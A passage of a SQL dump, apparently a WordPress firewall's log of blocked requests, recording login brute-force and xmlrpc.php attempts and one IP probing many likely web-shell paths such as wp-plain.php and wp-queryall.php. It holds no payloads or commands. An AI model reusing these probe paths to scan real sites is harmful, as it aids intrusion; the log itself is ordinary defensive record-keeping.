Firefox\\/41.0\"}','uoRGmjZaxChrS4PO8ebY2LyQ',0,1665689009.5914,511,'','POST',403,0,515,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','jUvZTFPiVKRJq0n1YEWNbG2D',0,1665690154.4692,18196,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','Bn4kYQAjHShPyI2qszVlXtmb',0,1665691007.4282,2531,'','POST',403,0,600,0,1,'',0),('103.96.110.35',1734372899,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','bSi5yYsgcPKWG9BqHfLUNrIT',0,1665692430.4945,633,'','POST',403,0,515,0,1,'',0),('121.78.79.85',2035175253,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','yeK3GskibCO5D8jP1opmIfvd',0,1665692439.5330,475,'','POST',403,0,515,0,1,'',0),('46.31.79.2',773803778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Ew4v0NHOq2AS7t6F3LsWgafD',0,1665692447.8061,1009,'','POST',403,0,515,0,1,'',0),('167.172.143.92',2813103964,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','yjKtYOF5cLQPxUTns4WMEHea',0,1665692447.5954,2032,'','POST',403,0,515,0,1,'',0),('121.78.79.85',2035175253,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','OVedtL8PnakFBYCN396v5KWH',0,1665692451.5495,512,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Wzdvou4OqaQHN3K8T60kR7Jr',0,1665692489.2568,549,'','POST',403,0,600,0,1,'',0),('167.71.94.207',2806472399,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','n3X4QtrRCHZSbMpshgDeB8Tl',0,1665692835.2083,11969,'','POST',403,0,700,0,1,'',0),('167.71.94.207',2806472399,'','https://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','oyVkS0cXBQldmCiDjbTe5P72',0,1665692843.8902,6634,'','POST',403,0,700,0,1,'',0),('134.19.179.131',2249438083,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DerNoWwJZzg4fAYKaRBhv0jx',0,1665693135.8793,18394,'','POST',403,0,515,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','uKCcFQBqLp7de4DM3gXVr9wa',0,1665693354.8186,3821,'','POST',403,0,600,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','MOYdQpAn5hKTWPFybm2RZCqa',0,1665697281.0987,472,'','POST',403,0,515,0,1,'',0),('116.202.128.32',1959428128,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bCEAmLRrHxwd21qSG7K9D4Ou',0,1665697283.6652,473,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','7R2NO6y35rYEv8WsTmoqcX1f',0,1665697284.5268,462,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','DCgGSPtE067OpdazvfKFN5lA',0,1665698143.8283,17691,'','POST',403,0,600,0,1,'',0),('84.39.116.180',1411871924,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cno9HFMNz6yp7fmxlbJEgOSi',0,1665714233.3847,18749,'','POST',403,0,515,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','ezRP27A6MmnCVUSxZjgHWEws',0,1665714332.8570,1243,'','POST',403,0,600,0,1,'',0),('192.64.82.118',3225440886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','7K64a2uIwsxm8Agk0BdPUjfv',0,1665715227.9137,18620,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','m4Pn28A6wgstNobpcTzKCxDE',0,1665716763.0571,17939,'','POST',403,0,600,0,1,'',0),('193.70.114.151',3242619543,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','YcGfhm1sbR9OXB2UP6Qp8INZ',0,1665716867.4441,1528,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','4fc6HRi25ZgYLC9PuVo1QybU',0,1665716870.7487,522,'','POST',403,0,515,0,1,'',0),('150.95.112.219',2522837211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','B8kisrYt1NVMZg4qoGuHFIhS',0,1665717465.6325,3738,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','UMukLTaIHFs1NrWRoSzc50qd',0,1665717450.7837,18609,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Z7FzHpNn4MylQLGgh2ocf1Um',0,1665717467.9879,2152,'','POST',403,0,515,0,1,'',0),('120.25.147.55',2014942007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Weh5ynZoV0kJaxD6CK1l4rvX',0,1665717472.2941,508,'','POST',403,0,515,0,1,'',0),('52.26.178.66',874164802,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','3NYn19OdGqjFmlRaeyA5gpBD',0,1665717492.0118,1295,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','dtJYAz7Qu50EgrlZijXywVUv',0,1665717495.2829,512,'','POST',403,0,515,0,1,'',0),('51.159.77.133',866078085,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','dRLxcArY5FktoJIMh9gsfamC',0,1665717497.9087,549,'','POST',403,0,515,0,1,'',0),('185.129.168.41',3112282153,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','EwMHDFctlenTh1moNbBUigRJ',0,1665717503.0951,572,'','POST',403,0,515,0,1,'',0),('164.92.169.121',2757536121,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','uTiqNRaft2bmePzQEw43hlVK',0,1665717512.7092,565,'','POST',403,0,515,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','ZhscVoq6UmLbYxOzEIMrj0SQ',0,1665717664.4973,6610,'','POST',403,0,600,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','mgZkrBcUi7wJELjpevC3lVn9',0,1665718851.8713,18406,'','POST',403,0,515,0,1,'',0),('194.163.163.7',3265504007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','9so6khXwgxZBUvbYT3u0MjKi',0,1665718857.2501,13056,'','POST',403,0,515,0,1,'',0),('120.25.147.55',2014942007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','WGgTE74P5NwkQbznutD2fMAr',0,1665718852.9132,17478,'','POST',403,0,515,0,1,'',0),('135.181.119.15',2276816655,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','Vdi5M62c7WEgt9ZoLu4myTxs',0,1665718881.5002,682,'','POST',403,0,515,0,1,'',0),('167.114.64.93',2809282653,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','zbxrIkmMvAQ6lZS9HYKDe2nd',0,1665718883.0357,546,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','NGBZbtOvcKzrCI7ou3pTSElW',0,1665718887.1664,604,'','POST',403,0,515,0,1,'',0),('68.183.22.104',1152849512,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','g3QyCdjsMDhLuZvBl7IEVG8w',0,1665718888.8373,1562,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','bMLpkrneX9svh7I0TuSzdw5Y',0,1665718892.2994,699,'','POST',403,0,515,0,1,'',0),('82.165.87.109',1386567533,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','RPnk3DSbOt7iT65ZqcrJMeVh',0,1665718908.1303,1292,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','O419qSi0Pcn8JUmK2yWdAtex',0,1665718913.1174,550,'','POST',403,0,515,0,1,'',0),('50.73.33.135',843653511,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','XyQMF4uzetAJCUI3Ojrk75No',0,1665718920.1005,536,'','POST',403,0,515,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ipSwAMcdNbfzYT08l7eERPUV',0,1665719221.6814,17167,'','POST',403,0,600,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/years.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','XVs9oiPw0ezNZ4nacyk12OIp',0,1665719822.8157,406,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4iRjV9Q0OCqKzXudsgcJmPZN',0,1665719824.1759,317,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','REWwcYAGhpfL6DumFXedjgUK',0,1665719825.4955,285,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','EjHMLhRKbg5aA8yJ6c0VmP3v',0,1665719826.7645,308,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lHairANdGw3XsxCDz9JVbU7Q',0,1665719828.0622,290,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QRLBJaIv0CTop2w3kfENi8mq',0,1665719829.3014,342,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','JpBnkK0RYU41AbjsiM62ytcC',0,1665719830.5025,344,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OkuTPy2SCZDXNBsadFh57xIM',0,1665719831.6588,300,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','O6CAoqhYM7Z3ndj0rDJiBEtV',0,1665719832.7776,293,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Mzeiox3sSF5d9uqL8g7fE1yZ',0,1665719833.9166,277,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','vKy5OzZ716Cx2Adl8Bts9IVY',0,1665719835.0596,276,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GrN9fyLTubDakEc1JAsxU4nR',0,1665719836.1765,279,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','M50b2O84XyGhHgEKuNPpA7lS',0,1665719837.2721,278,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','a2dNDX96wRHbmrqZgezFSL1M',0,1665719838.3613,277,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QmD6LvZSdVyb3K0R2znF1iot',0,1665719839.4548,288,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','d5bWyD2vZpOrTAkhc1KBtL7q',0,1665719840.5635,281,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','SVcyDKtfQx6zGCOakZ3N9PBX',0,1665719841.6661,328,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3ZyMc091DHfbsvUO2xiGjEuo',0,1665719842.8640,280,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FJgixuoGfsB5mXbQMrLZPpEw',0,1665719843.9637,285,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Axs8vZ4cC675WPb0g2MrkfUa',0,1665719845.0532,363,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4EChGtO5Ip7eqMQsrdcgfvHU',0,1665719846.3713,270,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TWIrDVjCd05UkBsXf37pJvKE',0,1665719847.4780,340,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kFPqCGnoRc98idz6MprSZ3Jt',0,1665719848.7817,299,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','STixcp9roE4aMbtRLNUJkml2',0,1665719849.8735,282,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0hMeERArZBqkg5J3Q6t24HNV',0,1665719850.9595,283,'','GET',403,0,515,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','G8QsNgeqp9ouPaK0kyL4T5lc',0,1665719852.2058,282,'','POST',403,0,515,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','58vOQpuGcXzDeH6d0taYqwy1',0,1665719853.3739,309,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','L5mr7QpT9ygiE4fY10slIvkw',0,1665719854.5991,293,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LxCaYH5gV9mftUhypu120wXq',0,1665719855.9794,329,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','YsoH8ZzriJGT3ednK7EaNLM5',0,1665719857.1979,296,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','N31Scr9buB8AynVfxwaRL7sP',0,1665719858.4638,317,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lTyZtbkrDpd3vaLjq7nNs4OA',0,1665719859.7711,314,'','POST',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wUV6QYp8BeqymcE52oGjMaI9',0,1665719861.3746,336,'','GET',403,0,700,0,1,'',0),('92.204.55.20',1556887316,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aBZ5TjpxG2coRWiJCYPlk7Xu',0,1665719862.7743,287,'','GET',403,0,700,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','vo5zGfCLrBR09EbadHgciwhs',0,1665722057.6081,711,'','POST',403,0,515,0,1,'',0),('210.245.90.215',3539294935,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','JHP7bj9zXNp0w3SuE4xisLmA',0,1665722065.5933,17431,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','7gEkPw1c6GFyTRIzrfjbeA2B',0,1665722065.6081,17416,'','POST',403,0,515,0,1,'',0),('51.75.130.25',860586521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','om2dxUQNOCcaBKi47qT1ZJIt',0,1665722074.5151,8578,'','POST',403,0,515,0,1,'',0),('156.67.211.101',2621690725,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VkfbgsiweO9ohBHaYvKzmFjl',0,1665722088.8105,1352,'','POST',403,0,515,0,1,'',0),('114.115.136.65',1920174145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 